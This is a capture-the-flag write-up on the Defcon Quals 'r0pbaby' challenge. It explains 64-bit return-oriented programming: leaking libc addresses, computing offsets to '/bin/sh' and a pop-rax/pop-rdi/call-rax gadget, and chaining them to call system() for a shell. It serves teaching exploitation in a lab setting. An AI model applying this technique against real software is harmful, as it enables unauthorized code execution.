Defcon Quals: r0pbaby (simple 64-bit ROP)

Unfortunately, I got stuck for quite a long time on a 2-point problem ("wwtw") and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it's an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it's actually easier! You can see the binary, my solution, and other stuff I used on this github repo.

It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it's not really necessary - I'm going to explain the same stuff again with two years more experience!

What is ROP?

Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has be in memory that's executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That's sometimes called "W^X", but it seems more appropriate to just call it common sense.

ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that's already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.

As a quick example, let's say you overwrite the return address of a vulnerable function with the address of libc's sleep() function. When the vulnerable function attempts to return, instead of returning to where it's supposed to (or returning to shellcode), it'll return to the first line of sleep().

On a 32-bit system, sleep() will look at the next-to-next value on the stack to find out how long to sleep(). On a 64-bit system, it'll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it's done, it'll return to the next value on the stack on both architectures, which could very well be another function.

We'll look at option 3 more in a little while, but for now let's take a quick look at options 1 and 2. The rest of this section isn't directly applicable to the exploitation stuff, so you're free to skip it if you want. :)

If you look at the results from option 1 and option 2, you'll see one strange thing: the return from "Get libc address" is higher than the addresses of printf() and system(). It also isn't page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn't actually the base address (which, in fairness, the level doesn't explicitly say it is).

I messed around a bit out of curiosity. Here's what I discovered...

First, run the program in gdb and get the address that they claim is libc:

From experience, that looks like a 64-bit address to me (6 bytes long, starts with 0x7f if you read it in little endian), so I tried print it as a 64-bit value:

(gdb) x/xg 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00007ffff7842000

Aha! It's a pointer to the actual base address! It seems a little odd to send that to the user, it does them basically no good, so I'll assume that it's a bug. :)

Stealing libc

If there's one thing I hate, it's attacking a level blind. Based on the output so far, it's pretty clear that they're going to want us to call a libc function, but they don't actually give us a copy of libc.so! While it's not strictly necessary, having a copy of libc.so makes this far easier.

I'll post more details about how and why to steal libc in a future post, but for now, suffice to stay: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you'll be thankful for it later! To make it possible to follow the rest of this post, here's libc-2.19.so from babycmd and here's libc-2.20.so from my box, which is the one I'll use for this writeup.

You might be wondering how to verify whether or not that actually IS the right library. For now, let's consider that to be homework. I'll be writing more about that in the future, I promise!

Find a crash

I played around with option 3 for awhile, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who'd already solved that problem. He'd reverse engineered the function already, saving me the trouble. :)

It turns out that the correct way to format things is by sending a length, then a newline, then the payload:

Well, that may be one of the easiest ways I've gotten a segfault! But the work isn't quite done. :)

rip control

Our first goal is going to be to get control of rip (that's like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.

But first, let's non-carefully control it!

The program indicates that it's writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I'll recognize in a debugger. Since it's a 64-bit app, I send 8 "A"s, 8 "B"s, and so on. If it doesn't crash. I send more.

All right, it crashes at 0x0000555555554eb3. Let's take a look at what lives at the current instruction (pro-tip: "x/i $rip" or equivalent is basically always the first thing I run on any crash I'm investigating):

(gdb) x/i $rip
=> 0x555555554eb3: ret

It's crashing while attempting to return! That generally only happens when either the stack pointer is messed up...

(gdb) print/x $rsp
$1 = 0x7fffffffd918

...which it doesn't appear to be, or when it's trying to return to a bad address...

We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I'm switching to using 'echo' on the commandline now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the "B"s, not before):

Now we can see that rip was successfully set to 0x0000424242424242 ("BBBBBB\0\0" because of little endian)!

How's the stack work again?

As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you're pretty comfortable with stacks or you've recently read/understood that post, feel free to skip this section!

Let's start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I'll explain how to deal with register parameters in 64-bit below.

Okay, so: a program's stack is a run-time structure that holds temporary values that functions need. Things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses) When the function returns, the data's all removed from the stack (it's not actually wiped from memory, it just becomes free to get overwritten). The register rsp always points to the most recent thing pushed to the stack and the next thing that would be popped off the stack.

Let's use sleep() as an example again. You call sleep() like this:

1: push 1000
2: call sleep

or like this:

1. mov [esp], 1000
2: call sleep

They're identical, as far as sleep() is concerned. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that's about it.

Before line 1, we don't know or care what's on the stack. We can look at it like this (I'm choosing completely arbitrary addresses so you can match up diagrams with each other):

Values lower than rsp are unused. That means that as far as the stack's concerned, they're unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they're never read. If they're accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with a use-after-free vulnerability or similar.

The value that rsp is pointing to and the values above it (at higher addresses) also don't really matter. They're part of the stack frame for the function that's calling sleep(), and sleep() doesn't care about those. It only cares about its own stack frame (a stack frame, as we'll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).

Line 1 pushes 1000 onto the stack. The frame will then look like this:

And that's the entire stack frame for the sleep(0 function call! It's possible that there are other registers preserved on the stack, in addition to rbp, but that doesn't really change anything. We only care about the parameters and the return address.

And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).

The parameters are cleared off the stack by either the caller or callee, depending on the compiler, but that won't come into play for this writeup. However, when ROP is used to call multiple functions, unless the function clean up their own parameters off the stack, the exploit developer has to do it themselves. Typically, on Windows functions clean up after themselves but on other OSes they don't (but you can't rely on that). This is done by using a "pop ret", "pop pop ret", etc., after each function call. See my ropasaurusrex writeup for more details.

Enter: 64-bit

The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don't work).

Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don't have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we'd have this code instead:

No parameters, just the return address, saved frame pointer, and local variables. It's exceedingly rare for the stack to be used for parameters on 64-bit.

Stacks: the important bit

Okay, so that's a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).

But here's the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn't really know where you came from. I mean, not really. It knows the return address that's on the stack, but doesn't really have a way to validate that it's real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it's 32-bit. Or that rdi/rsi/etc. contain parameters if it's 64-bit.

So let's say you overwrote the return address on the stack and returned to the first line of sleep(). What's it going to do?

As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:

sleep() will push some registers, make room for local variables, and really just do its own thing. When it's all done, it'll grab the return address from the stack, return to it, and somebody will move rsp back to the calling function's stack frame (it, getting rid of the parameters from the stack).

Using system()

Because this level uses stdout and stdin for i/o, all we really have to do is make this call:

system("/bin/sh")

Then we can run arbitrary commands. Seems pretty simple, eh? We don't even care where system() returns to, once it's done the program can just crash!

You just have to do two things:

set rip to the address of system()

set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)

Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It's just a matter of grabbing the address of system() and using that in the overflow.

Setting rdi to the pointer to "/bin/sh" is a little more problematic, though. First, we need to find the address of "/bin/sh" somehow. Then we need a "gadget" to put it in rdi. A "gadget", in ROP, refers to a small piece of code that performs an operation then returns.

It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it'd come in handy?

Finding "/bin/sh"

So, this is actually pretty easy. We need to find "/bin/sh" given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won't change their relative positions to each other. Addresses in two different binaries will likely be different, though.

If you fire up IDA, and go to the "strings" tab (shift-F12), you can search for "/bin/sh". You'll see that "/bin/sh" will have an address something like 0x7ffff6aa307c.

Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):

Once you've obtained the address of "/bin/sh", find the address of any libc function - we'll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you'll discover that the address of "/bin/sh" is 0x11f71c bytes after the address of system(). As I said earlier, that won't change, so we can reliably use that in our exploit.

What a beautiful sequence! It pops the next value of the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It's such a lovely gadget! I was surprised and excited to find it, though I'm sure every other CTF team already knew about it. :)

The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the "/bin/sh" string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you'll get 0xa7969 (on my copy of libc).

Let's look at an example of what's actually going on when we call that gadget. You're at the end of main() and getting ready to return. rsp is pointing to what it thinks is the return address, but is really "BBBBBBBB"-now-gadget_addr:

The first instruction - pop rax - runs. rax is now 0x4343434343434343 ("CCCCCCCC").

The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 ("DDDDDDDD").

Then the final instruction - call rax - is called. It'll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!

Putting it all together

I realize this is a lot to take in if you can't read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).

Here's what we have:

The ability to write up to 1024 bytes onto the stack

The ability to get the address of system()

The ability to get the address of "/bin/sh", based on the address of system()

The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack

We're overflowing a local variable in main(). Immediately before our overflow, this is what main()'s stack frame probably looks like:

Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer (or whatever, it doesn't really matter, but you can prove it's the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after it returns (it is)).

The main thing is, as we saw earlier, if you send the string "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD", the "BBBBBBBB" winds up as main()'s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:

It's trying to call "CCCCCCCC" with the parameter "DDDDDDDD". Awesome! Let's try it again, but this time we'll plug in our sh_address in place of "DDDDDDDD" to make sure that's working (I strongly believe in incremental testing :) ):

Unfortunately, you can't return into system(). I couldn't figure out why, but on Twitter Jan Kadijk said that it's likely because system() ends when it sees the end of file (EOF) marker, which makes perfect sense.

So in the interest of proving that this actually returns to a function, we'll call printf (0x00007FFFF7892F10) instead:

It prints out its first parameter - "/bin/sh" - proving that printf() was called and therefore the return chain works!

The exploit

Here's the full exploit in Ruby. If you want to run this against your own system, you'll have to calculate the offset of the "/bin/sh" string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.

[update] Or... do it the easy way

After I posted this, I got a tweet from @gaasedelen informing me that libc has a "magic" address that will literally call exec() with "/bin/sh", making much of this unnecessary for this particular level. You can find it by seeing where the "/bin/sh" string is referenced. You can return to that address and a shell pops.

But it's still a good idea to know how to construct a ROP chain, even if it's not strictly necessary. :)

Conclusion

And that's how to perform a ROP attack against a 64-bit binary! I'd love to hear feedback!